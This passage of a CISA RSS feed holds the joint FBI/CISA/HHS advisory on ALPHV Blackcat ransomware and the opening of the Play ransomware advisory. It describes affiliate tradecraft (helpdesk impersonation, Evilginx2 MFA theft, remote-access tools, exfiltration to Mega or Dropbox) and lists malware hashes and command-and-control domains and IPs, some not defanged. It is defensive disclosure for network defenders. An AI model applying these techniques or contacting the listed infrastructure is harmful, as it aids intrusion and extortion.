4983.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA23-353A-StopRansomware-ALPHV-Blackcat.stix_.json" class="c-file__link" target="_blank">AA23-353A STIX JSON</a>
4984.    <span class="c-file__size">(JSON,       32.93 KB
4985.  )</span>
4986.  </div>
4987. </div>
4988. <h3><strong>TECHNICAL DETAILS</strong></h3>
4989. <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK<sup>®</sup> for Enterprise</a> framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
4990. <p>ALPHV Blackcat affiliates use advanced social engineering techniques and open source research on a company to gain initial access. Actors pose as company IT and/or helpdesk staff and use phone calls or SMS messages [<a href="https://attack.mitre.org/versions/v14/techniques/T1598/" title="Phishing for Information">T1598</a>] to obtain credentials from employees to access the target network [<a href="https://attack.mitre.org/versions/v14/techniques/T1586/" title="Compromise Accounts">T1586</a>]. ALPHV Blackcat affiliates use uniform resource locators (URLs) to live-chat with victims to convey demands and initiate processes to restore the victims’ encrypted files.</p>
4991. <p>After gaining access to a victim network, ALPHV Blackcat affiliates deploy remote access software such as AnyDesk, Mega sync, and Splashtop in preparation of data exfiltration. ALPHV Blackcat affiliates create a user account, “aadmin,” and use Kerberos token generation for domain access [<a href="https://attack.mitre.org/versions/v14/techniques/T1558/" title="Steal or Forge Kerberos Tickets">T1558</a>]. After gaining access to networks, they use legitimate remote access and tunneling tools, such as Plink and Ngrok [<a href="https://attack.mitre.org/versions/v14/software/S0508/" title="ngrok">S0508</a>]. ALPHV Blackcat affiliates claim to use Brute Ratel C4 [<a href="https://attack.mitre.org/versions/v14/software/S1063/" title="Brute Ratel C4">S1063</a>] and Cobalt Strike [<a href="https://attack.mitre.org/versions/v14/software/S0154/" title="Cobalt Strike">S1054</a>] as beacons to command and control servers. ALPHV Blackcat affiliates use the open source adversary-in-the-middle attack [<a href="https://attack.mitre.org/versions/v14/techniques/T1557/" title="Adversary-in-the-Middle">T1557</a>] framework Evilginx2, which allows them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. The actors also obtain passwords from the domain controller, local network, and deleted backup servers to move laterally throughout the network [<a href="https://attack.mitre.org/versions/v14/techniques/T1555/" title="Credentials from Password Stores">T1555</a>].</p>
4992. <p>To evade detection, affiliates employ allowlisted applications such as Metasploit. Once installed on the domain controller, the logs are cleared on the exchange server. Then Mega.nz or Dropbox are used to move, exfiltrate, and/or download victim data. The ransomware is then deployed, and the ransom note is embedded as a file.txt. According to public reporting, affiliates have additionally used POORTRY and STONESTOP to terminate security processes.</p>
4993. <p>Some ALPHV Blackcat affiliates exfiltrate data after gaining access and extort victims without deploying ransomware. After exfiltrating and/or encrypting data, ALPHV Blackcat affiliates communicate with victims via TOR [<a href="https://attack.mitre.org/versions/v14/software/S0183/" title="Tor">S0183</a>], Tox, email, or encrypted applications. The threat actors then delete victim data from the victim’s system.</p>
4994. <p>ALPHV Blackcat affiliates offer to provide unsolicited cyber remediation advice as an incentive for payment, offering to provide victims with “vulnerability reports” and “security recommendations” detailing how they penetrated the system and how to prevent future re-victimization upon receipt of ransom payment. The ALPHV Blackcat encryptor results in a file with the following naming convention: RECOVER-(seven-digit extension) FILES.txt.</p>
4995.  
4996.  
4997.  
4998. <figure class="c-figure c-figure--image u-align-center" role="group">
4999.  
5000.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%201%20-%20Ransom%20Note%20Instruction.png?itok=nHWunuch" width="804" height="587" alt="Figure 1: Ransom Note Instruction">
5001.  
5002.  
5003.  
5004. </div>
5005.      <figcaption class="c-figure__caption"><em>Figure 1: Ransom Note Instruction</em></figcaption>
5006.  </figure>
5007. <h3><strong>INDICATORS OF COMPROMISE (IOCs)</strong></h3>
5008. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5009. <caption><em>Table 1: MD5 Hashes</em></caption>
5010. <thead>
5011. <tr>
5012. <td><strong>MD5</strong></td>
5013. <td><strong>Description</strong></td>
5014. <td><strong>File Name</strong></td>
5015. </tr>
5016. </thead>
5017. <tbody>
5018. <tr>
5019. <td>
5020. <p>944153fb9692634d6c70899b83676575</p>
5021. </td>
5022. <td>
5023. <p>ALPHV Windows Encryptor</p>
5024. </td>
5025. <td>
5026. <p> </p>
5027. </td>
5028. </tr>
5029. <tr>
5030. <td>
5031. <p>341d43d4d5c2e526cadd88ae8da70c1c</p>
5032. </td>
5033. <td>
5034. <p>Anti Virus Tools Killer</p>
5035. </td>
5036. <td>
5037. <p><code>363.sys</code></p>
5038. </td>
5039. </tr>
5040. <tr>
5041. <td>
5042. <p>34aac5719824e5f13b80d6fe23cbfa07</p>
5043. </td>
5044. <td>
5045. <p>CobaltStrike BEACON</p>
5046. </td>
5047. <td>
5048. <p><code>LMtool.exe</code></p>
5049. </td>
5050. </tr>
5051. <tr>
5052. <td>
5053. <p>eea9ab1f36394769d65909f6ae81834b</p>
5054. </td>
5055. <td>
5056. <p>CobaltStrike BEACON</p>
5057. </td>
5058. <td>
5059. <p><code>Info.exe</code></p>
5060. </td>
5061. </tr>
5062. <tr>
5063. <td>
5064. <p>379bf8c60b091974f856f08475a03b04</p>
5065. </td>
5066. <td>
5067. <p>ALPHV Linux Encryptor</p>
5068. </td>
5069. <td>
5070. <p>him</p>
5071. </td>
5072. </tr>
5073. <tr>
5074. <td>
5075. <p>ebca4398e949286cb7f7f6c68c28e838</p>
5076. </td>
5077. <td>
5078. <p>SimpleHelp Remote Management tool</p>
5079. </td>
5080. <td>
5081. <p><code>first.exe</code></p>
5082. </td>
5083. </tr>
5084. <tr>
5085. <td>
5086. <p>c04c386b945ccc04627d1a885b500edf</p>
5087. </td>
5088. <td>
5089. <p>Tunneler Tool</p>
5090. </td>
5091. <td>
5092. <p><code>conhost.exe</code></p>
5093. </td>
5094. </tr>
5095. <tr>
5096. <td>
5097. <p>824d0e31fd08220a25c06baee1044818</p>
5098. </td>
5099. <td>
5100. <p>Anti Virus Tools Killer</p>
5101. </td>
5102. <td>
5103. <p><code>ibmModule.dll</code></p>
5104. </td>
5105. </tr>
5106. <tr>
5107. <td>
5108. <p>eea9ab1f36394769d65909f6ae81834b</p>
5109. </td>
5110. <td>
5111. <p>CobaltStrike BEACON</p>
5112. </td>
5113. <td>
5114. <p>ConnectivityDiagnos.exe</p>
5115. </td>
5116. </tr>
5117. <tr>
5118. <td>
5119. <p>944153fb9692634d6c70899b83676575</p>
5120. </td>
5121. <td>
5122. <p>ALPHV Windows Encryptor</p>
5123. </td>
5124. <td>
5125. <p><code>7O3cCX9YcHMV2.exe</code></p>
5126. </td>
5127. </tr>
5128. <tr>
5129. <td>
5130. <p>61804a029e9b1753d58a6bf0274c25a6</p>
5131. </td>
5132. <td>
5133. <p>MeshCentral Agent</p>
5134. </td>
5135. <td>
5136. <p><code>WPEHOSTSVC64.exe</code></p>
5137. </td>
5138. </tr>
5139. <tr>
5140. <td>
5141. <p>83deea3b61b6a734e7e4a566dbb6bffa</p>
5142. </td>
5143. <td>
5144. <p>ScreenConnect & attacker tools installer</p>
5145. </td>
5146. <td>
5147. <p><code>deployService.exe</code></p>
5148. </td>
5149. </tr>
5150. <tr>
5151. <td>
5152. <p>8738b8637a20fa65c6e64d84d1cfe570</p>
5153. </td>
5154. <td>
5155. <p>Suspected Proxy Tool</p>
5156. </td>
5157. <td>
5158. <p><code>socks32.exe</code></p>
5159. </td>
5160. </tr>
5161. </tbody>
5162. </table>
5163. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5164. <caption><em>Table 2: SHA256 Hashes</em></caption>
5165. <thead>
5166. <tr>
5167. <td><strong>SHA256</strong></td>
5168. <td><strong>Description</strong></td>
5169. </tr>
5170. </thead>
5171. <tbody>
5172. <tr>
5173. <td>
5174. <p>c64300cf8bacc4e42e74715edf3f8c3287a780c9c0a38b0d9675d01e7e231f16</p>
5175. </td>
5176. <td>
5177. <p>ALPHV Windows Encryptor</p>
5178. </td>
5179. </tr>
5180. <tr>
5181. <td>
5182. <p>1f5e4e2c78451623cfbf32cf517a92253b7abfe0243297c5ddf7dd1448e460d5</p>
5183. </td>
5184. <td>
5185. <p>Anti Virus Tools Killer</p>
5186. </td>
5187. </tr>
5188. <tr>
5189. <td>
5190. <p>3670dd4663adca40f168f3450fa9e7e84bc1a612d78830004020b73bd40fcd71</p>
5191. </td>
5192. <td>
5193. <p>CobaltStrike BEACON</p>
5194. </td>
5195. </tr>
5196. <tr>
5197. <td>
5198. <p>af28b78c64a9effe3de0e5ccc778527428953837948d913d64dbd0fa45942021</p>
5199. </td>
5200. <td>
5201. <p>CobaltStrike BEACON</p>
5202. </td>
5203. </tr>
5204. <tr>
5205. <td>
5206. <p>bbfe7289de6ab1f374d0bcbeecf31cad2333b0928ea883ca13b9e733b58e27b1</p>
5207. </td>
5208. <td>
5209. <p>ALPHV Linux Encryptor</p>
5210. </td>
5211. </tr>
5212. <tr>
5213. <td>
5214. <p>5d1df950b238825a36fa6204d1a2935a5fbcfe2a5991a7fc69c74f476df67905</p>
5215. </td>
5216. <td>
5217. <p>SimpleHelp Remote Management tool</p>
5218. </td>
5219. </tr>
5220. <tr>
5221. <td>
5222. <p>bd9edc3bf3d45e3cdf5236e8f8cd57a95ca3b41f61e4cd5c6c0404a83519058e</p>
5223. </td>
5224. <td>
5225. <p>Tunneler Tool</p>
5226. </td>
5227. </tr>
5228. <tr>
5229. <td>
5230. <p>732e24cb5d7ab558effc6dc88854f756016352c923ff5155dcb2eece35c19bc0</p>
5231. </td>
5232. <td>
5233. <p>Anti Virus Tools Killer</p>
5234. </td>
5235. </tr>
5236. </tbody>
5237. </table>
5238. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5239. <caption><em>Table 3: SHA1 Hashes</em></caption>
5240. <thead>
5241. <tr>
5242. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>SHA1</strong></th>
5243. <th scope="col" role="columnheader"><strong>Description</strong></th>
5244. </tr>
5245. </thead>
5246. <tbody>
5247. <tr>
5248. <td>
5249. <p>3dd0f674526f30729bced4271e6b7eb0bb890c52</p>
5250. </td>
5251. <td>
5252. <p>ALPHV Windows Encryptor</p>
5253. </td>
5254. </tr>
5255. <tr>
5256. <td>
5257. <p>d6d442e8b3b0aef856ac86391e4a57bcb93c19ad</p>
5258. </td>
5259. <td>
5260. <p>Anti Virus Tools Killer</p>
5261. </td>
5262. </tr>
5263. <tr>
5264. <td>
5265. <p>6b52543e4097f7c39cc913d55c0044fcf673f6fc</p>
5266. </td>
5267. <td>
5268. <p>CobaltStrike BEACON</p>
5269. </td>
5270. </tr>
5271. <tr>
5272. <td>
5273. <p>004ba0454feb2c4033ff0bdb2ff67388af0c41b6</p>
5274. </td>
5275. <td>
5276. <p>CobaltStrike BEACON</p>
5277. </td>
5278. </tr>
5279. <tr>
5280. <td>
5281. <p>430bd437162d4c60227288fa6a82cde8a5f87100</p>
5282. </td>
5283. <td>
5284. <p>SimpleHelp Remote Management tool</p>
5285. </td>
5286. </tr>
5287. <tr>
5288. <td>
5289. <p>1376ac8b5a126bb163423948bd1c7f861b4bfe32</p>
5290. </td>
5291. <td>
5292. <p>Tunneler Tool</p>
5293. </td>
5294. </tr>
5295. <tr>
5296. <td>
5297. <p>380f941f8047904607210add4c6da2da8f8cd398</p>
5298. </td>
5299. <td>
5300. <p>Anti Virus Tools Killer</p>
5301. </td>
5302. </tr>
5303. </tbody>
5304. </table>
5305. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5306. <caption><em>Table 4: Network Indicators</em></caption>
5307. <thead>
5308. <tr>
5309. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Indicator Type</strong></th>
5310. <th scope="col" role="columnheader"><strong>Network Indicator</strong></th>
5311. <th scope="col" role="columnheader"><strong>Description</strong></th>
5312. </tr>
5313. </thead>
5314. <tbody>
5315. <tr>
5316. <td>
5317. <p>Domain</p>
5318. </td>
5319. <td>
5320. <p>resources.docusong[.]com</p>
5321. </td>
5322. <td>
5323. <p>Command and Control Server</p>
5324. </td>
5325. </tr>
5326. <tr>
5327. <td>
5328. <p>Domain</p>
5329. </td>
5330. <td>
5331. <p>Fisa99.screenconnect[.]com</p>
5332. </td>
5333. <td>
5334. <p>ScreenConnect Remote Access</p>
5335. </td>
5336. </tr>
5337. <tr>
5338. <td>
5339. <p>IP Address</p>
5340. </td>
5341. <td>
5342. <p>5.199.168.24</p>
5343. </td>
5344. <td>
5345. <p>Command and Control Server</p>
5346. </td>
5347. </tr>
5348. <tr>
5349. <td>
5350. <p>IP Address</p>
5351. </td>
5352. <td>
5353. <p>91.92.254.193</p>
5354. </td>
5355. <td>
5356. <p>SimpleHelp Remote Access</p>
5357. </td>
5358. </tr>
5359. <tr>
5360. <td>
5361. <p>Domain</p>
5362. </td>
5363. <td>
5364. <p>pcrendal[.]com</p>
5365. </td>
5366. <td>
5367. <p>Command and Control Server</p>
5368. </td>
5369. </tr>
5370. <tr>
5371. <td>
5372. <p>Domain</p>
5373. </td>
5374. <td>
5375. <p>instance-qqemas-relay[.]screenconnect[.]com</p>
5376. </td>
5377. <td>
5378. <p>ScreenConnect Remote Access</p>
5379. </td>
5380. </tr>
5381. <tr>
5382. <td>
5383. <p>Domain</p>
5384. </td>
5385. <td>
5386. <p>instance-rbjvws-relay.screenconnect[.]com</p>
5387. </td>
5388. <td>
5389. <p>ScreenConnect Remote Access</p>
5390. </td>
5391. </tr>
5392. <tr>
5393. <td>
5394. <p>IP Address</p>
5395. </td>
5396. <td>
5397. <p>5.199.168[.]233</p>
5398. </td>
5399. <td>
5400. <p>IP Address used by Threat Actor</p>
5401. </td>
5402. </tr>
5403. <tr>
5404. <td>
5405. <p>IP Address</p>
5406. </td>
5407. <td>
5408. <p>92.223.89[.]55</p>
5409. </td>
5410. <td>
5411. <p>IP Address used by Threat Actor</p>
5412. </td>
5413. </tr>
5414. <tr>
5415. <td>
5416. <p>IP Address</p>
5417. </td>
5418. <td>
5419. <p>185.195.59[.]218</p>
5420. </td>
5421. <td>
5422. <p>IP Address used by Threat Actor</p>
5423. </td>
5424. </tr>
5425. <tr>
5426. <td>
5427. <p>IP Address</p>
5428. </td>
5429. <td>
5430. <p>51.159.103[.]112</p>
5431. </td>
5432. <td>
5433. <p>IP Address used by Threat Actor</p>
5434. </td>
5435. </tr>
5436. <tr>
5437. <td>
5438. <p>IP Address</p>
5439. </td>
5440. <td>
5441. <p>45.32.141[.]168</p>
5442. </td>
5443. <td>
5444. <p>Command and Control Server</p>
5445. </td>
5446. </tr>
5447. <tr>
5448. <td>
5449. <p>IP Address</p>
5450. </td>
5451. <td>
5452. <p>45.77.0[.]92</p>
5453. </td>
5454. <td>
5455. <p>Command and Control Server</p>
5456. </td>
5457. </tr>
5458. </tbody>
5459. </table>
5460. <h3><strong>MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
5461. <p>See Table 5 through Table 7 for all referenced threat actor tactics and techniques in this advisory.</p>
5462. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5463. <caption><em>Table 5: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques - Reconnaissance</em></caption>
5464. <thead>
5465. <tr>
5466. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
5467. <th scope="col" role="columnheader"><strong>ID</strong></th>
5468. <th scope="col" role="columnheader"><strong>Use</strong></th>
5469. </tr>
5470. </thead>
5471. <tbody>
5472. <tr>
5473. <td>
5474. <p>Phishing for Information</p>
5475. </td>
5476. <td>
5477. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1598/" title="Phishing for Information">T1598</a></p>
5478. </td>
5479. <td>
5480. <p>ALPHV Blackcat affiliates pose as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees to access the target network.</p>
5481. </td>
5482. </tr>
5483. </tbody>
5484. </table>
5485. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5486. <caption><em>Table 6: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Resource Development</em></caption>
5487. <thead>
5488. <tr>
5489. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
5490. <th scope="col" role="columnheader"><strong>ID</strong></th>
5491. <th scope="col" role="columnheader"><strong>Use</strong></th>
5492. </tr>
5493. </thead>
5494. <tbody>
5495. <tr>
5496. <td>
5497. <p>Compromise Accounts</p>
5498. </td>
5499. <td>
5500. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1586/" title="Compromise Accounts">T1586</a></p>
5501. </td>
5502. <td>
5503. <p>ALPHV Blackcat affiliates use compromised accounts to gain access to victims’ networks.</p>
5504. </td>
5505. </tr>
5506. </tbody>
5507. </table>
5508. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5509. <caption><em>Table 7: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Credential Access</em></caption>
5510. <thead>
5511. <tr>
5512. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
5513. <th scope="col" role="columnheader"><strong>ID</strong></th>
5514. <th scope="col" role="columnheader"><strong>Use</strong></th>
5515. </tr>
5516. </thead>
5517. <tbody>
5518. <tr>
5519. <td>
5520. <p>Obtain Credentials from Passwords Stores</p>
5521. </td>
5522. <td>
5523. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1555/" title="Credentials from Password Stores">T1555</a></p>
5524. </td>
5525. <td>
5526. <p>ALPHV Blackcat affiliates obtain passwords from local networks, deleted servers, and domain controllers.</p>
5527. </td>
5528. </tr>
5529. <tr>
5530. <td>Steal or Force Kerberos Tickets</td>
5531. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1558/" title="Steal or Force Kerberos Tickets">T1558</a></td>
5532. <td>ALPHV Blackcat/ALPHV affiliates use Kerberos token generation for domain access.</td>
5533. </tr>
5534. <tr>
5535. <td>
5536. <p>Adversary-in-the-Middle</p>
5537. </td>
5538. <td>
5539. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1557/" title="Adversary-in-the-Middle">T1557</a></p>
5540. </td>
5541. <td>
5542. <p>ALPHV Blackcat/ALPHV affiliates use the open-source framework Evilginx2 to obtain MFA credentials, login credentials, and session cookies for targeted networks.</p>
5543. </td>
5544. </tr>
5545. </tbody>
5546. </table>
5547. <h3><strong>INCIDENT RESPONSE</strong></h3>
5548. <p>If compromise is detected, organizations should:</p>
5549. <ol>
5550. <li>Quarantine or take offline potentially affected hosts.</li>
5551. <li>Reimage compromised hosts.</li>
5552. <li>Provision new account credentials.</li>
5553. <li>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.</li>
5554. <li>Report the compromise or phishing incident to CISA via CISA’s 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (<a href="mailto:SOC@cisecurity.org" title="Report to the Center for Internet Security">SOC@cisecurity.org</a> or 866-787-4722).</li>
5555. <li>To report spoofing or phishing attempts (or to report that you’ve been a victim), file a complaint with the FBI’s <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center">Internet Crime Complaint Center (IC3</a><u>)</u>, or contact your local <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">FBI Field Office</a> to report an incident.</li>
5556. </ol>
5557. <h3><strong>MITIGATIONS</strong></h3>
5558. <p>These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and HHS recommend that software manufactures incorporate secure by design principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the security posture for their customers.</p>
5559. <p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">joint guide</a>.</p>
5560. <p>FBI, CISA, and HHS recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on threat actor activity and to reduce the risk of compromise by ALPHV Blackcat threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" target="_blank" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections. Due to the threat ALPHV Blackcat’s poses in the healthcare sector, healthcare organizations can look to the <a href="https://hphcyber.hhs.gov/performance-goals.html" title="HPH Cybersecurity Performance Goals">Healthcare and Public Health (HPH) Sector Cybersecurity Performance Goals</a> to implement cybersecurity protections against the most common threats. tactics, techniques, and procedures used against this sector.</p>
5561. <ul>
5562. <li>Secure remote access tools by:
5563. <ul>
5564. <li><strong>Implementing</strong><strong> application controls</strong> to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
5565. <li>Applying recommendations in CISA's joint <a href="https://www.cisa.gov/sites/default/files/2023-06/Guide%20to%20Securing%20Remote%20Access%20Software_clean%20Final_508c.pdf" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a>.</li>
5566. </ul>
5567. </li>
5568. <li><strong>Implementing FIDO/WebAuthn authentication or Public key Infrastructure (PKI)-based MFA </strong>[<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report March 2023 Update">CPG 2.H</a>][<a href="https://hphcyber.hhs.gov/performance-goals.html" title="HPH Cybersecurity Performance Goals - Multifactor Authentication">HPH CPG – Multifactor Authentication</a>]. These MFA implementations are resistant to phishing and not susceptible to push bombing or SIM swap attacks, which are techniques known be used by ALPHV Blackcat affiliates. See CISA’s Fact Sheet <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">Implementing Phishing-Resistant MFA</a> for more information.</li>
5569. <li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting ransomware, implement a tool that logs and reports all network traffic [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report March 2023 Update">CPG 5.1</a>][<u><a href="https://hphcyber.hhs.gov/performance-goals.html" title="HPH Cybersecurity Performance Goals - Detect and Respond to Relevant Threats and Tactics, Techniques and Procedures">HPH CPG – Detect and Respond to Relevant Threats and Tactics, Techniques and Procedures</a></u>], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</li>
5570. <li><strong>Implement user training on social engineering and phishing attacks</strong> [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="CPG Report March 2023 Update">CPG 2.I</a>][<a href="https://hphcyber.hhs.gov/performance-goals.html" title="HPH Cybersecurity Performance Goals - Basic Cybersecurity Training">HPH CPG – Basic Cybersecurity Training</a>]. Regularly educate users on identifying suspicious emails and links, not interacting with those suspicious items, and the importance of reporting instances of opening suspicious emails, links, attachments, or other potential lures.</li>
5571. <li><strong>Implement internal mail and messaging monitoring</strong>. Monitoring internal mail and messaging traffic to identify suspicious activity is essential as users may be phished from outside the targeted network or without the knowledge of the organizational security team. Establish a baseline of normal network traffic and scrutinize any deviations.</li>
5572. <li><strong>Implement free security tools</strong> to prevent cyber threat actors from redirecting users to malicious websites to steal their credentials. For more information see, CISA’s <a href="https://www.cisa.gov/resources-tools/resources/free-cybersecurity-services-and-tools" title="Free Cybersecurity Services and Tools">Free Cybersecurity Services and Tools</a> webpage.</li>
5573. <li><strong>Install and maintain antivirus software.</strong> Antivirus software recognizes malware and protects your computer against it. Installing antivirus software from a reputable vendor is an important step in preventing and detecting infections. Always visit vendor sites directly rather than clicking on advertisements or email links. Because attackers are continually creating new viruses and other forms of malicious code, it is important to keep your antivirus software up to date.</li>
5574. </ul>
5575. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
5576. <p>In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
5577. <p>To get started:</p>
5578. <ol>
5579. <li>Select an ATT&CK technique described in this advisory (see Tables 1-3).</li>
5580. <li>Align your security technologies against the technique.</li>
5581. <li>Test your technologies against the technique.</li>
5582. <li>Analyze your detection and prevention technologies’ performance.</li>
5583. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
5584. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
5585. </ol>
5586. <p>CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
5587. <h3><strong>RESOURCES</strong></h3>
5588. <ul>
5589. <li><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
5590. <li>Resource to reduce the risk of a ransomware attack: <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">#StopRansomware Guide</a>.</li>
5591. <li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0" title="Ransomware Readiness Assessment CSET v10.3">Ransomware Readiness Assessment</a>.</li>
5592. <li>Health and Human Services <a href="https://hphcyber.hhs.gov" title="HPH Cybersecurity Gateway">HPH Cybersecurity Gateway</a> hosts the HPH CPGs and links to HHS cybersecurity resources.</li>
5593. </ul>
5594. <h3><strong>DISCLAIMER</strong></h3>
5595. <p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and HHS.</p>
5596. <h3><strong>VERSION HISTORY</strong></h3>
5597. <p>December 19, 2023: Initial version.<br><br>
5598. February 27, 2024: Update.</p>
5599. </description>
5600.  <pubDate>Tue, 19 Dec 2023 09:31:04 EST</pubDate>
5601.    <dc:creator>CISA</dc:creator>
5602.    <guid isPermaLink="false">/node/20626</guid>
5603.    </item>
5604. <item>
5605.  <title>#StopRansomware: Play Ransomware</title>
5606.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a</link>
5607.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
5608. <p><strong><em>Note:</em></strong><em> This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
5609. <p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.</p>
5610. <p>Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.</p>
5611. <p>In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.</p>
5612. <p>The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.</p>
5613. <p>The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date.</p>
5614. <p>Download a PDF version of this report:</p>
5615.  
5616.  
5617.  
5618.  
5619.  
5620. <div class="c-file">
5621.    <div class="c-file__download">
5622.    <a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-352a-stopransomware-play-ransomware.pdf" class="c-file__link" target="_blank">AA23-352A #StopRansomware: Play Ransomware</a>
5623.    <span class="c-file__size">(PDF,       536.19 KB
5624.  )</span>
5625.  </div>
5626. </div>
